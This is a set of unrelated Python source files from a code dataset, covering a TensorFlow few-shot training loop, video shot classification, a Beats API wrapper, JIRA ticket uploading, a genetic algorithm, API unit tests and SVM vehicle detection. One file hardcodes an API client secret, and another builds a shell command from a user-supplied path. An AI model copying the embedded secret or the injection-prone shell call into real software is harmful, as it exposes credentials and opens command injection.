={s_imgs: suppImgs, \n q_img: queryImgBatch,\n q_label: queryLabelBatch,\n }, options = runOptions, run_metadata=run_metadata)\n writer.add_run_metadata(run_metadata, 'step%d' % i)\n else:\n ACC, LOSS, OPT = session.run([accuracy, loss, optimizer], feed_dict\n ={s_imgs: suppImgs, \n q_img: queryImgBatch,\n q_label: queryLabelBatch,\n })\n \n # Observe Values\n if (step%100) == 0:\n print(\"ITER: \"+str(step))\n print(\"ACC: \"+str(ACC))\n print(\"LOSS: \"+str(LOSS))\n print(\"------------------------\")\n \n # Run an additional test set \n if (step % check) == 0:\n TotalAcc=0.0\n #run ten batches to test accuracy\n BatchToTest=10\n for repeat in range(BatchToTest):\n\n suppImgs, suppLabels, queryImgBatch, queryLabelBatch = get_next_batch(True)\n \n # Run session for test values\n ACC, LOSS = session.run([accuracy, loss], feed_dict\n ={s_imgs: suppImgs, \n q_img: queryImgBatch,\n q_label: queryLabelBatch,\n })\n TotalAcc += ACC\n print(\"Accuracy on the independent test set is: \"+str(TotalAcc/float(BatchToTest)) )\n \n # Save out the model once complete\n save_path = Saver.save(session, SAVE_PATH, step)\n print(\"Model saved in path: %s\" % SAVE_PATH)\n \n # Use the test set\n '''sumAcc = 0.0\n for k in range(0,100):\n # Get test support values \n suppImgs, suppLabels, queryImgBatch, queryLabelBatch = get_next_batch(True)\n\n a = session.run(accuracy, feed_dict = {s_imgs: suppImgs, \n q_img: queryImgBatch,\n q_label: queryLabelBatch\n })\n sumAcc += a\n \n print(\"Independent Test Set: \"+str(float(sumAcc)/100))'''\n","sub_path":"src/matching-network/mnist/mnist_matching_network_cosine.py","file_name":"mnist_matching_network_cosine.py","file_ext":"py","file_size_in_byte":10615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"139154670","text":"import sys\nimport os\nimport subprocess\n\nif(len(sys.argv) < 3):\n\tprint(\"Usage: python3 parse_video_info.py path_to_video mode\")\n\texit(1)\n\nvideo_ = sys.argv[1]\nfilename, _ = os.path.splitext(sys.argv[1])\nfile_ = filename+\"_faces.txt\"\nmode = sys.argv[2]\n\n\n#### UTILS FUNCTIONS\n# base and high of the two images\ndef area_ratio(b1, h1, b2, h2):\n\ta1 = b1*h1\n\ta2 = b2*h2\n\tif(a1 == 0 or a2 == 0):\n\t\treturn 0\n\tif(a1 > a2):\n\t\treturn a2/a1\n\treturn a1/a2\n\n\n\n# coordinates is an array of 4 points: (x_top, y_top, x_bottom, y_bottom)\ndef on_head(coordinates, h, n_split=3, h_ratio_limit=0.7):\n\tlower_limit_h = h/n_split\n\ty1_down = coordinates[3]\n\th_ratio = (coordinates[3]-coordinates[1])/(lower_limit_h)\n\treturn (y1_down <= lower_limit_h and h_ratio >= h_ratio_limit)\n\n# coordinates is an array of 4 points: (x_top, y_top, x_bottom, y_bottom)\n# b and h are the dimensions of th original frame\n# n_split is the number of \"split\" on which the frame will be divided into\n# large_split is to decide if we want only the center split, or to esclude only the first and last\ndef on_center(coordinates, b, h, n_split=3, large_split=True, h_ratio_limit=0.4):\n\tif large_split:\n\t\tupper_limit_h = h/n_split\n\t\tlower_limit_h = h*(n_split-1)/n_split\n\telse:\n\t\tif(n_split % 2 == 0):\n\t\t\tmid = n_split / 2\n\t\t\tupper_limit_h = h*(mid-1)/n_split\n\t\t\tlower_limit_h = h*(mid+1)/n_split\n\t\telse:\n\t\t\tmid = n_split // 2\n\t\t\tupper_limit_h = h*mid/n_split\n\t\t\tlower_limit_h = h*(mid+1)/n_split\n\th_ratio = (coordinates[3]-coordinates[1])/(lower_limit_h-upper_limit_h)\n\treturn (coordinates[1] >= upper_limit_h and coordinates[3] <= lower_limit_h and h_ratio >= h_ratio_limit)\n\n\n\n#### MAIN ###\n\n# read video dimensions first\ncmd_ = \"./get_video_info.sh \"+video_\np = subprocess.Popen(cmd_ , shell=True, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\nstdout, stderr = p.communicate()\ndim = stdout.strip().split(\"\\n\") # dim[0] = b, dim[1] = h\n\n# parse input file\nframes = {}\nwith open(file_, \"r\") as f:\n\tfor line in f:\n\t\twords = line.split()\n\t\tframe = int(words[0])\n\t\tx_top = int(words[1])\n\t\t#if(x_top < 0): x_top = 0\n\t\ty_top = int(words[2])\n\t\t#if(y_top < 0): y_top = 0\n\t\tx_down = int(words[3])\n\t\t#if(x_down > int(dim[0])): x_down = int(dim[0])\n\t\ty_down = int(words[4])\n\t\t#if(y_down > int(dim[1])): y_down = int(dim[1])\n\t\t\n\t\tif frame not in frames.keys():\n\t\t\tframes[frame] = [(x_top, y_top, x_down, y_down)]\n\t\telse:\n\t\t\tframes[frame].append((x_top, y_top, x_down, y_down))\n\nold_key = -1\nfrms = {'plan_moyen':[], 'plan_rapproche':[], 'plan_americain':[], 'gros_plan':[], 'plan_large':[], 'other':[], 'unknown':[i for i in range(int(dim[2])) if i not in frames.keys() and i % 25 == 0]}\nfor key, value in sorted(frames.items()):\n\tif(old_key == -1): old_key = key\n\telif(key < old_key+20): continue\n\tif(len(value) == 1):\n\t\tcoordinates = value[0]\n\t\tratio = area_ratio(abs(coordinates[2]-coordinates[0]), abs(coordinates[1]-coordinates[3]), int(dim[0]), int(dim[1]))\n\t\t# GROS PLAN\n\t\tif ratio > 0.135:\n\t\t\tfrms['gros_plan'].append(key)\n\t\t# PLAN MOYEN (0.006 0.01) -> 0 < h < 154\n\t\telif ratio > 0.006 and ratio < 0.0068 and coordinates[3] < 384-250 and coordinates[3] > 384-340:\n\t\t\tfrms['plan_moyen'].append(key)\n\t\t# PLAN RAPPROCHE (0.03 and 0.08) -> 164 < h < 254\n\t\telif ratio > 0.05 and ratio < 0.06 and coordinates[3] < 384-130 and coordinates[3] > 384-220:\n\t\t\tfrms['plan_rapproche'].append(key)\n\t\t# PLAN AMERICAIN (0.01 and 0.03) -> \n\t\t#elif ratio > 0.02 and ratio < 0.027 and coordinates[3] < 384-160:# and coordinates[3] > 384-220:\n\t\t#\tfrms['plan_americain'].append(key)\n\t\t# PLAN LARGE (0 and 0.006)\n\t\t#elif ratio < 0.006 and ratio >= 0:\n\t\t#\tfrms['plan_large'].append(key)\n\t\telse:\n\t\t\tfrms['other'].append(key)\n\t\t\tcontinue #if not chosen, do not update key\n\telse:\n\t\t#coordinates = value[0]\n\t\t#ratio = area_ratio(abs(coordinates[2]-coordinates[0]), abs(coordinates[1]-coordinates[3]), int(dim[0]), int(dim[1]))\n\t\t#if ratio >= 0 and ratio < 0.006:\n\t\t#\tfrms['plan_large'].append(key)\n\t\tfrms['other'].append(key)\n\t\t\n\told_key = key\nprint(\" \".join(str(x) for x in frms[mode]))\n","sub_path":"parse_video_info.py","file_name":"parse_video_info.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"111146925","text":"from pybeats.api import BeatsAPI\nfrom pybeats.model import Collection,SearchResult,LoggedInUser\nimport json\n\nCLIENT_ID = \"7fw6kmzz8qb4pt8g6zg7ud6x\"\nCLIENT_SECRET = \"JvRD23GQDVbCxGPaBvDNeM9a\"\n\n# USERNAME = \"your-beats-username\"\n# PASSWORD = \"your-beats-password\"\n\n# set up your api instance\napi = BeatsAPI(client_id=CLIENT_ID, client_secret=CLIENT_SECRET)\n\n\n#searching\ndef search_beats(the_query):\n\tsearch_results = api.get_predictive_search_results(the_query)\n\tfor result in search_results['data']:\n\t\treturn json.dumps(search_results['data'])\n\n\tget_audio(result['id'])\n\n#search and only return track\ndef search_tr(tq):\n\tresp = api.get_search_results(query=tq, search_type='track')\n\tfor result in resp['data']:\n\t\treturn json.dumps(resp['data'])\n\n\ndef get_audio(track_id):\n\taudio_results = api.get_audio_asset(track_id)\n\treturn audio_results\n","sub_path":"app/beats_api.py","file_name":"beats_api.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"158517107","text":"# -*- coding: utf-8 -*-\nimport pandas as pd \nimport os \nfrom shutil import copyfile\ncsv_file_name = input('input xception csv kmeans : ')\ndata = pd.read_csv(csv_file_name)\ndata = data.drop(['xception','Unnamed: 0'],axis=1)\ndata = data.sort_values(by=['cluster'])\n\n\nfor row in data.iterrows():\n path = os.path.join(\"clusters/{}\".format(row[1][1]))\n print(path)\n if not os.path.exists(path):\n os.mkdir(path)\n print(path,'created')\n \n if os.path.exists(path):\n print(path + ' : exists')\n dst = path+'/'+row[1][0].split('/')[-1]\n copyfile(row[1][0], dst)\n","sub_path":"xception/results_to_dir.py","file_name":"results_to_dir.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"341375886","text":"from __future__ import print_function\nimport jira.client\nfrom jira.client import JIRA\nfrom jira import JIRA, JIRAError\nimport dateutil.parser\nfrom datetime import datetime, timedelta\nimport time\nimport csv\nimport pyodbc\nimport sys\nimport logging\nimport config\nimport re\n\nimport pprint\n\n#Get 3 inputs from the user client, name, source\n#Alternately this can also be pulled from the order form. but have a check in the middle to confirm by a user\n\nimport logging\nLOG_FILENAME = 'JIRA_BUlkUploadCR.log'\nlogging.basicConfig(filename=LOG_FILENAME,level=logging.DEBUG)\n\nlogging.debug('This message should go to the log file')\nclient='MODA'\ncrname='Test Change Req v9'\ncontext='Sample context...'\nsource='MCHD'\nehr='Custom or Unknown'\nimpround='InitialBuild'\nbuildtype='Analytics Implementation:951'\n\n\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\ncnxn = pyodbc.connect('DRIVER={SQL Server};SERVER=QDWSQLOPS01;DATABASE=AnalyticsMonitoring;Trusted_Connection=TRUE')\ncursor = cnxn.cursor()\n\noptions = {'server': 'https://jira.arcadiasolutions.com'}\njira = JIRA(options, basic_auth=(config.username, config.password))\n\nrecent_issue = jira.search_issues(\n \"reporter = dinesh.jayapathy and summary~'Initial Build Kick off' ORDER BY createdDate DESC\",\n maxResults=2)\n\n# recentcount=0\nfor issueq in recent_issue:\n # if recentcount==0:\n\n try:\n exidraw = issueq.fields.customfield_11005\n except:\n exidraw = None\n # recentcount+=1\n\nprint('this is the recent exidraw: ' + str(exidraw))\n\nif exidraw is not None:\n # exid=re.match('^[^\\d]*(\\d+)',exidraw,1)\n p = re.match(r'^[^\\d]*(\\d+)', exidraw)\n exid = p.group(1)\n print('this is the exid ' + str(exid))\n\nelse:\n print('Exid is empty: ' + str(exidraw))\n\ncursor.execute(\n \"\"\"\n select Client_Acronym, Data_Source_Acronym,Important_Context,Arcadia_Implementation_Lead_Email_Address,id \n , CASE WHEN Arcadia_Implementation_Type LIKE '%Direct Feed%' THEN 'Direct Feed'\n WHEN [Data_Extraction_Connection_Type] LIKE '%Flat File%' THEN 'Flat File'\n WHEN Source_System_Software NOT LIKE '%Flat File%' AND Source_System_Software NOT LIKE '%Other%' THEN Source_System_Software\n ELSE 'Custom or Unknown' END AS EHR\n ,TRY_CONVERT(date,insert_timestamp)\n \n from ARC_OrderFormValues where ID in ('211')\n \"\"\")\n\norderform = cursor.fetchall()\n\n\n\nfor i in orderform:\n\n exid = int(exid)+1\n # print (c,i)\n client = i[0]\n source = i[1]\n context = 'Test description. Will come from excel template later on.'\n email = i[3]\n idO = i[4]\n ehr = i[5]\n impround = 'Initial Build'\n buildtype = 'Analytics Implementation:951'\n print(exid, client, source, context, email, idO)\n\n watcher = 'dinesh.jayapathy@arcadiasolutions.com'\n watcher = watcher.replace('@arcadiasolutions.com', '')\n # watcher=email.replace('@arcadiasolutions.com','')\n\n\n issue_list = [\n\n # {\n # 'project': {'key': 'AAI'},\n #\n # 'summary': client+' '+source+' '+ehr+' '+impround,#\n #\n # 'customfield_11601': {'value': client}, #this is client\n # 'customfield_11609': {'value': source },#this is the data source. It should be an existing value. Else it will error out.Works now\n # 'customfield_11626':impround, #this is impround field\n # 'description':context,\n # 'issuetype': {'name': 'Epic'},\n # 'customfield_11618':{'value':'Custom or Unknown'},\n # 'customfield_11630': {'value': 'Unknown'}, # customer contract id. manadatory For all new tickets.\n # 'customfield_10301': client+' '+source+' '+ehr+' '+impround, # Epic name. Mandatory field. For all new tickets.\n # 'assignee': {'name': watcher},\n # },\n\n { # story gets created with this setup. ClientName field casuses issue in upload.\n 'project': {'key': 'AAI'},\n # 'projectname': 'Arcadia Analytics Implementation',\n 'summary': client + ' ' + source + ' ' + ehr + ' ' + impround + ' Kick off', #\n\n # 'customfield_11601': client, #this is client. This is causing issue.\n 'customfield_11603': {'value': 'Kick off'},\n 'customfield_11609': {'value': source}, # this is the data source.\n # 'customfield_11626':{'value':impround}, #this is impround field. This is causing issue in upload.\n 'description': context,\n 'issuetype': {'name': 'Story'},\n 'customfield_11618': {'value': ehr},\n 'customfield_11630': {'value': 'Unknown'}, # customer contract id. manadatory For all new tickets.\n # 'customfield_10301': client+' '+source+' '+ehr+' '+impround, # Epic name. Mandatory field. For all new tickets.\n 'assignee': {'name': watcher},\n # 'customfield_10300': issueEpic,\n 'customfield_11005': str(exid)+str(client)+str(source)+str(ehr)+str(impround)+'Kick off' #this is the issue id it has to have proper exid\n # You can pull the exid from JIRA. Run a JQL to pull the most recent Kick off ticket uploaded by DJ. Pull the exid from that, increment it and assign it to the variable exid. For each ticket it gets incremented.\n # add epic link field after checking . Add this to story\n\n # this is a sample issue id . The first part os exid which has to be unique\n # customfield_11005': u'1604CCC NEWHOther | v. 0Initial BuildKick off',\n }\n\n ]\n\n pprint.pprint(issue_list)\n try:\n\n issues = jira.create_issues(field_list=issue_list)\n print('These are the created issues :' + str(issues))\n\n\n\n\n except Exception as e:\n\n if 'EXIST' in e.message:\n print('The issue does not exist')\n\n\n exit(1)\n else:\n print(e)","sub_path":"Projects/tet2.py","file_name":"tet2.py","file_ext":"py","file_size_in_byte":5846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"78073036","text":"from numpy import array, random\n\nfrom neural import NeuralNetwork\n\n\nclass Individual:\n \"\"\" defines individual of a population \"\"\"\n def __init__(self, layers=None, weights=None):\n self.score = 0\n # creating new random object\n if weights is None:\n self.nn = NeuralNetwork(layers=layers)\n # mutation\n else:\n self.nn = NeuralNetwork(layers=layers, weights=weights)\n \n def find_fitness(self):\n return self.score\n \n def reset(self):\n \"\"\" used during evolution of population \"\"\"\n self.score = 0\n\nclass Population:\n \"\"\" defines functions related to population of genetic algorithm \"\"\"\n def __init__(self, pop_size=1000, mutate_prob=0.03, retain_unfit_prob=0.01, select=0.333, layers=None):\n self.pop_size = pop_size # number of individuals consisiting population\n self.mutate_prob = mutate_prob # probability that a gene is mutated \n self.retain_unfit_prob = retain_unfit_prob # propability of retaining unfit individuals\n self.select = select # fraction of fittest population being selected\n self.layers = layers # layers used in neural network\n self.fitness_history = [] # stores fitness values for each generation\n\n self.generation = 1 # holds current generation number\n # population initialization\n self.individuals = [Individual(layers=layers) for i in range(self.pop_size)] \n \n def grade(self):\n \"\"\" finds population fitness \"\"\"\n self.pop_fitness = max([i.find_fitness() for i in self.individuals])\n self.fitness_history.append(self.pop_fitness)\n \n def select_parents(self):\n \"\"\" selects fittest parents with few unfittest as well \"\"\"\n self.individuals = sorted(self.individuals, key=lambda i: i.find_fitness(), reverse=True)\n # selecting fittest parents\n parents_selected = int(self.select * self.pop_size)\n self.parents = self.individuals[:parents_selected]\n # including some unfittest parents\n unfittest = self.individuals[parents_selected:]\n for i in unfittest:\n if self.retain_unfit_prob > random.rand():\n self.parents.append(i)\n \n # reset properties of parents\n for individual in self.parents:\n individual.reset()\n\n \n def crossover(self, weights1, weights2):\n \"\"\" combines the genes of two parent to form genes of child \"\"\"\n weights = []\n\n for w1, w2 in zip(weights1, weights2):\n w = []\n for column1, column2 in zip(w1, w2):\n column = []\n for theta1, theta2 in zip(column1, column2):\n # selecting randomly from father or mother genes\n choosen = random.choice((theta1, theta2)) \n column.append(choosen)\n w.append(column)\n weights.append(array(w))\n return weights\n\n def breed(self):\n \"\"\" creates new children for populating the population using fittest parents \"\"\"\n children_size = self.pop_size - len(self.parents)\n children = []\n if len(self.parents) > 0:\n while len(children) < children_size:\n father = random.choice(self.parents)\n mother = random.choice(self.parents)\n if father != mother:\n child_weights = self.crossover(father.nn.weights, mother.nn.weights)\n child = Individual(layers=self.layers, weights=child_weights)\n children.append(child)\n \n self.individuals = self.parents + children\n\n def evolve(self):\n \"\"\" define process of evolution \"\"\"\n self.grade()\n self.select_parents()\n self.breed()\n\n print(f'{self.generation} --> {self.fitness_history[-1]}') \n self.generation += 1","sub_path":"genetic.py","file_name":"genetic.py","file_ext":"py","file_size_in_byte":4020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"645026288","text":"import math\n\nfrom ..data_structures.source_shared import SourceVector\n\n\ndef convert_rotation_matrix_to_degrees(m0, m1, m2, m3, m4, m5, m8):\n angle_y = -math.asin(round(m2, 6))\n c = math.cos(angle_y)\n if abs(c) > 0.005:\n translate_x = m8 / c\n translate_y = -m5 / c\n angle_x = (math.atan2(translate_y, translate_x))\n translate_x = m0 / c\n translate_y = -m1 / c\n angle_z = (math.atan2(translate_y, translate_x))\n else:\n angle_x = 0\n translate_x = m4\n translate_y = m3\n angle_z = (math.atan2(translate_y, translate_x))\n return angle_x, angle_y, angle_z\n\ndef vector_i_transform(input: SourceVector,\n matrix_c0: SourceVector, \n matrix_c1: SourceVector,\n matrix_c2: SourceVector,\n matrix_c3: SourceVector):\n temp = SourceVector()\n output = SourceVector()\n\n temp.x = input.x - matrix_c3.x\n temp.y = input.y - matrix_c3.y\n temp.z = input.z - matrix_c3.z\n\n output.x = temp.x * matrix_c0.x + temp.y * matrix_c0.y + temp.z * matrix_c0.z\n output.y = temp.x * matrix_c1.x + temp.y * matrix_c1.y + temp.z * matrix_c1.z\n output.z = temp.x * matrix_c2.x + temp.y * matrix_c2.y + temp.z * matrix_c2.z\n\n return output\n","sub_path":"All_In_One/addons/SourceIO/utilities/math_utilities.py","file_name":"math_utilities.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"335086521","text":"import json\nimport unittest\nimport warnings\n\nfrom parameterized import parameterized\n\nfrom data.Get_TestData.Get_D1_AM_Data import Get_SM_TestData\nfrom lib.D1_UserList_Action import UL_Action\nfrom tools.service import Service\nfrom tools.util import Utility\n\nclass AM_Test(unittest.TestCase):\n\n def setUp(self) -> None:\n Utility.initialize_DB()\n warnings.simplefilter('ignore', ResourceWarning)\n self.ul = UL_Action(Service.get_session_tm())\n\n # 查询演员\n @parameterized.expand(Get_SM_TestData.get_login_excel_data_query_actor(1))\n def test_SurroundingMall_query_actor(self, url, res_method, cases_name, expected):\n edit_data = {\"CASENAME\": cases_name, \"URL\": url, \"METHOD\": res_method, \"EXPECTED\": expected}\n result = self.ul.doGet(edit_data['URL'])\n\n if edit_data['CASENAME'] == \"查询存在的电影名\":\n if edit_data['METHOD'] == \"GET\":\n actual = str(json.loads(result)['count'])\n\n elif edit_data['CASENAME'] == \"查询不存在的电影名\":\n if edit_data['METHOD'] == \"GET\":\n actual = str(json.loads(result)['count'])\n\n elif edit_data['CASENAME'] == \"查询不存在的page\":\n if edit_data['METHOD'] == \"GET\":\n actual = str(json.loads(result)['count'])\n\n else:\n edit_data['CASENAME'] = '用例名错误'\n\n Utility.logger(edit_data['CASENAME'], actual, actual, expected)\n self.assertEqual(actual, edit_data['EXPECTED'])\n\n # 删除演职演员\n @parameterized.expand(Get_SM_TestData.get_login_excel_data_delete_actor(1))\n def test_SurroundingMall_delete_actor(self, url, res_method, cases_name, expected):\n delete_data = {\"CASENAME\": cases_name, \"URL\": url, \"METHOD\": res_method, \"EXPECTED\": expected}\n result = self.ul.doDelete(delete_data['URL'])\n if delete_data['CASENAME'] == \"删除存在的演职人员ID\":\n if delete_data['METHOD'] == \"DELETE\":\n actual = json.loads(result)['msg']\n\n elif delete_data['CASENAME'] == \"删除不存在的演职人员ID\":\n if delete_data['METHOD'] == \"DELETE\":\n actual = json.loads(result)['msg']\n\n else:\n delete_data['CASENAME'] = '用例名错误'\n\n Utility.logger(delete_data['CASENAME'], actual, actual, expected)\n self.assertEqual(actual, delete_data['EXPECTED'])\n\n # 增加演职演员\n @parameterized.expand(Get_SM_TestData.get_login_excel_data_add_actor(1))\n def test_SurroundingMall_add_actor(self, url, res_method, mid, realName, actorType, role, actorPic, cases_name,\n expected):\n add_data = {\"CASENAME\": cases_name, \"URL\": url, \"METHOD\": res_method,\n \"DATA\": {\"mid\": mid, \"realName\": realName, \"actorType\": actorType, \"role\": role,\n \"actorPic\": actorPic}, \"EXPECTED\": expected}\n\n actual = \"\"\n if add_data['CASENAME'] == \"添加演职人员ID\":\n if add_data['METHOD'] == \"POST\":\n result = self.ul.doPost(add_data['URL'], add_data['DATA'])\n actual = json.loads(result)['msg']\n\n elif add_data['CASENAME'] == \"添加不存在的演职人员ID\":\n if add_data['METHOD'] == \"DELETE\":\n result = self.ul.doPost(add_data['URL'], add_data['DATA'])\n actual = json.loads(result)['msg']\n\n elif add_data['CASENAME'] == \"添加重复的演职人员ID\":\n if add_data['METHOD'] == \"POST\":\n result = self.ul.doPost(add_data['URL'], add_data['DATA'])\n actual = json.loads(result)['msg']\n else:\n add_data['CASENAME'] = '用例名错误'\n Utility.logger(add_data['CASENAME'], actual, actual, expected)\n self.assertEqual(actual, add_data['EXPECTED'])\n\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"2.Travel_Request/cases/D1_ActorManagement_Test.py","file_name":"D1_ActorManagement_Test.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"591628783","text":"#!/usr/bin/env python\n\"\"\"\n_User.GetAssociation_\n\nRetrieve a user/group association\n\n\"\"\"\n\n\n\n\nfrom WMCore.Database.DBFormatter import DBFormatter\n\n\nclass GetAssociation(DBFormatter):\n \"\"\"\n _GetAssociation_\n\n Get the associations between a requestor and groups given the\n requestor DB id.\n A list of group IDs is returned.\n\n \"\"\"\n\n def execute(self, requestorId, conn = None, trans = False):\n \"\"\"\n _execute_\n\n\n\n \"\"\"\n self.sql = \"SELECT group_id FROM reqmgr_group_association \"\n self.sql += \" WHERE requestor_id = :requestor_id\"\n binds = {\"requestor_id\": requestorId}\n result = self.dbi.processData(self.sql, binds,\n conn = conn, transaction = trans)\n values = [ x[0] for x in self.format(result)]\n return values\n","sub_path":"src/python/WMCore/RequestManager/RequestDB/MySQL/Requestor/GetAssociation.py","file_name":"GetAssociation.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"269497314","text":"from system.models import UserProfile\n\n\ndef datos_globales(request):\n\n try:\n profile = UserProfile.objects.get(user=request.user)\n grupo = profile.get_grupo_display()\n except Exception:\n grupo = \"\"\n\n contexto = {\n 'grupo': grupo\n }\n\n return contexto\n","sub_path":"hermespy/global_settings.py","file_name":"global_settings.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"601492163","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 15 22:36:12 2017\r\n\r\n@author: Anton Varfolomeev\r\n\"\"\"\r\n\r\nimport pickle\r\nimport cv2\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.image as mpimg\r\nimport os\r\nfrom skimage.feature import hog\r\n\r\nfrom extract_features import *\r\nfrom process_image import *\r\nimport time\r\n\r\n\r\n\r\nos.chdir('D:\\\\WORK\\\\CarND\\\\p5\\\\CarND-P5')\r\ntest_dir = './test_images/'\r\nout_dir = './out/'\r\n\r\n\r\n#%%\r\n\r\nimages = []\r\nfor entry in os.scandir(test_dir):\r\n if entry.is_file():\r\n print(entry.path)\r\n img = cv2.imread(entry.path)\r\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\r\n images.append(img)\r\n\r\n\r\n#%%\r\n# Read in our vehicles and non-vehicles\r\n\r\ndef get_image_list(path):\r\n images = [os.path.join(dirpath, f)\r\n for dirpath, dirnames, files in os.walk(path)\r\n for f in files if f.endswith('.png')]\r\n return images\r\n \r\npath = 'e:/data/carnd/p5/'\r\ncars = get_image_list(path+'vehicles')\r\nnotcars = get_image_list(path+'non-vehicles')\r\n\r\nmyPath = 'e:/data/carnd/p5/my/'\r\nmyCars = get_image_list(myPath + 'Car')\r\nmyNotCars = get_image_list(myPath + 'NotCars')\r\n\r\n#%%\r\ncolorspace = 'HLS' # Can be RGB, HSV, LUV, HLS, YUV, YCrCb\r\norient = 11\r\npix_per_cell = 8\r\ncell_per_block = 2\r\nhog_channel = 'ALL' #(1,2) # Can be 0, 1, 2, or \"ALL\"\r\n\r\nt=time.time()\r\n\r\ncar_features = extract_features(cars, cspace=colorspace, orient=orient, \r\n pix_per_cell=pix_per_cell, cell_per_block=cell_per_block, \r\n hog_channel=hog_channel)\r\nnotcar_features = extract_features(notcars, cspace=colorspace, orient=orient, \r\n pix_per_cell=pix_per_cell, cell_per_block=cell_per_block, \r\n hog_channel=hog_channel)\r\nt2 = time.time()\r\nprint(round(t2-t, 2), 'Seconds to extract HOG features...')\r\n# Create an array stack of feature vectors\r\nX = np.vstack((car_features, notcar_features)).astype(np.float64) \r\n# Fit a per-column scaler\r\nX_scaler = StandardScaler().fit(X)\r\n# Apply the scaler to X\r\nscaled_X = X_scaler.transform(X).astype(np.float32)\r\n\r\n# Define the labels vector\r\ny = np.hstack((np.ones(len(car_features)), \r\n np.zeros(len(notcar_features)))).astype(np.int32)\r\n\r\n\r\n# Split up data into randomized training and test sets\r\nrand_state = np.random.randint(0, 100)\r\nX_train, X_test, y_train, y_test = train_test_split(\r\n scaled_X, y, test_size=0.2, random_state=rand_state)\r\n\r\nprint('Using:',orient,'orientations',pix_per_cell,\r\n 'pixels per cell and', cell_per_block,'cells per block')\r\nprint('Feature vector length:', len(X_train[0]))\r\n# Use a linear SVC \r\n\r\n\r\n#%% \r\n# Check the training time for the SVC\r\nuSvm = cv_svm (X_train, X_test, y_train, y_test)\r\n#%%\r\n# Check the prediction time for a single sample\r\n\r\nidx = np.arange(len(y_test))\r\nnp.random.shuffle(idx)\r\n\r\nt=time.time()\r\nn_predict = 1000\r\nyr = np.zeros(n_predict)\r\n\r\n#for i in range (n_predict):\r\nyr = uSvm.predict(X_test[idx[:n_predict]])[1].ravel()\r\nprint(sum( yr != y_test[idx[0:n_predict]]), \" mistakes from \", n_predict)\r\n#print('For these',n_predict, 'labels: ', y_test[0:n_predict])\r\nt2 = time.time()\r\nprint(round(t2-t, 5), 'Seconds to predict', n_predict,'labels with SVC')\r\n\r\n\r\n#%%\r\nt=time.time()\r\nmyCarFeatures = extract_features(myCars, cspace=colorspace, orient=orient, \r\n pix_per_cell=pix_per_cell, cell_per_block=cell_per_block, \r\n hog_channel=hog_channel)\r\nmyNotCarFeatures = extract_features(myNotCars, cspace=colorspace, orient=orient, \r\n pix_per_cell=pix_per_cell, cell_per_block=cell_per_block, \r\n hog_channel=hog_channel)\r\nt2 = time.time()\r\nprint(round(t2-t, 2), 'Seconds to extract HOG features...')\r\n# Create an array stack of feature vectors\r\nmyX = np.vstack((myCarFeatures, myNotCarFeatures)).astype(np.float64) \r\n# Fit a per-column scaler\r\nX_scaler = StandardScaler().fit(myX)\r\n# Apply the scaler to X\r\nscaled_X = X_scaler.transform(myX).astype(np.float32)\r\n\r\n# Define the labels vector\r\nmyY = np.hstack((np.ones(len(myCarFeatures)), \r\n np.zeros(len(myNotCarFeatures)))).astype(np.int32)\r\n\r\n\r\n# Split up data into randomized training and test sets\r\nrand_state = np.random.randint(0, 100)\r\nmyX_train, myX_test, myY_train, myY_test = train_test_split(\r\n scaled_X, myY, test_size=0.1, random_state=rand_state)\r\n#%%\r\nmySvm = cv_svm (myX_train, myX_test, myY_train, myY_test)\r\n\r\n# Check the score of the SVC\r\nprint('Test Accuracy of mySVC on my data = ', round(score(mySvm,myX_test, myY_test), 4))\r\nprint('Test Accuracy of uSVC on my data = ', round(score(uSvm,myX_test, myY_test), 4))\r\nprint('Test Accuracy of mySVC on u data = ', round(score(mySvm,X_test, y_test), 4))\r\nprint('Test Accuracy of uSVC on u data = ', round(score(uSvm,X_test, y_test), 4))\r\n\r\n#%%\r\nidx = np.arange(len(myY_test))\r\nnp.random.shuffle(idx)\r\n\r\nt=time.time()\r\nn_predict = 1000\r\nyr = uSvm.predict(myX_test[idx[0:n_predict]])[1].ravel()\r\n#print('For these',n_predict, 'labels: ', y_test[0:n_predict])\r\nt2 = time.time()\r\nprint(\"u on my\",sum( yr != myY_test[idx[0:n_predict]]), \" mistakes from \", n_predict)\r\nprint(round(t2-t, 5), 'Seconds to predict', n_predict,'labels with SVC')\r\n\r\nt=time.time()\r\nyr = mySvm.predict(myX_test[idx[0:n_predict]])[1].ravel()\r\n#print('For these',n_predict, 'labels: ', y_test[0:n_predict])\r\nt2 = time.time()\r\nprint(\"my on my\",sum( yr != myY_test[idx[0:n_predict]]), \" mistakes from \", n_predict)\r\nprint(round(t2-t, 5), 'Seconds to predict', n_predict,'labels with SVC')\r\n\r\n#%%\r\nunX_train = np.vstack((myX_train, X_train));\r\nunY_train = np.hstack((myY_train, y_train));\r\nunX_test = np.vstack((X_test, myX_test));\r\nunY_test = np.hstack((y_test, myY_test));\r\n\r\nfrom sklearn.utils import shuffle\r\n\r\nunX_train, unY_train 